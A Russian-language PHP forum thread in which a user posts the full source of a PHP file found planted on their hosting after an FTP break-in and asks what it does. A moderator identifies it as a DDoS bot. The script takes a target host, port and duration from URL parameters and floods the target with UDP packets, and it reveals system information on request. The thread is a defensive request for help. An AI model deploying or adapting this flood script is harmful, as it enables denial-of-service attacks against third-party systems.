Warning: Cannot use a scalar value as an array in /home/admin/public_html/forum/include/fm.class.php on line 757

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/include/fm.class.php on line 770

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/topic.php on line 737
Форумы портала PHP.SU :: Взлом ftp и появление посторонних файлов на хостинге

 PHP.SU

 Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи


 Страниц (1): [1]   

> Описание: Взлом ftp и появление посторонних файлов на хостинге
Поиск в теме | Версия для печати
Evgenylebedevv
Отправлено: 12 Мая, 2016 - 01:47:18
Post Id


Новичок


Покинул форум
Сообщений всего: 5
Дата рег-ции: Май 2016  


Помог: 0 раз(а)
Недавно обнаружил у себя на хостинге в корневой директории вот такой вот файлик, по моему он собирает данные с пользователей и кому-то отсылает (название ctioVp):

PHP:
скопировать код в буфер обмена
  2. $host = $_GET['host'];
  3. $port = $_GET['port'];
  4. $exec_time = $_GET['time'];
  5. $Sendlen = $_GET['len'];
  7.  
  8. if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0)
  9. {
  10.         if (StrLen($_GET['rat'])<>0)
  11.         {
  12.                 echo php_uname();
  13.                 exit;
  14.         }
  15.         exit;
  16. }
  17.  
  18. for($i=0; $i < $Sendlen; $i++)
  19. {
  20.         $out .= "A";
  21. }
  22.  
  23. $max_time = time() + $exec_time;
  24. while(1)
  25. {
  26.     if(time() > $max_time)
  27.         {
  28.         break;
  29.     }
  30.     $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
  31.     if($fp)
  32.         {
  33.                 fwrite($fp, $out);
  34.                 fclose($fp);
  35.     }
  36. }

Что это такое?

(Отредактировано автором: 12 Мая, 2016 - 02:06:57)

 
 Top
kuller
Отправлено: 12 Мая, 2016 - 02:38:46
Post Id



Частый посетитель


Покинул форум
Сообщений всего: 561
Дата рег-ции: Нояб. 2009  


Помог: 2 раз(а)
похоже вот ответ на ваш вопрос http://www.php.su/fsockopen
 
 Top
Мелкий Супермодератор
Отправлено: 12 Мая, 2016 - 07:56:35
Post Id



Активный участник


Покинул форум
Сообщений всего: 11926
Дата рег-ции: Июль 2009  
Откуда: Россия, Санкт-Петербург


Помог: 618 раз(а)
Поздравляю, вы участник DDoS атакующей системы.
Скрипт получает параметрами куда, как долго, и сколько пустых данных отправлять и этим и занимается. Цель - забить канал атакуемой системы всяким бесполезным флудом.


-----
PostgreSQL DBA
 
 Top
Поиск в теме | Версия для печати
Страниц (1): [1]
Сейчас эту тему просматривают: 0 (гостей: 0, зарегистрированных: 0)
« Вопросы новичков »


Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.
  



Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB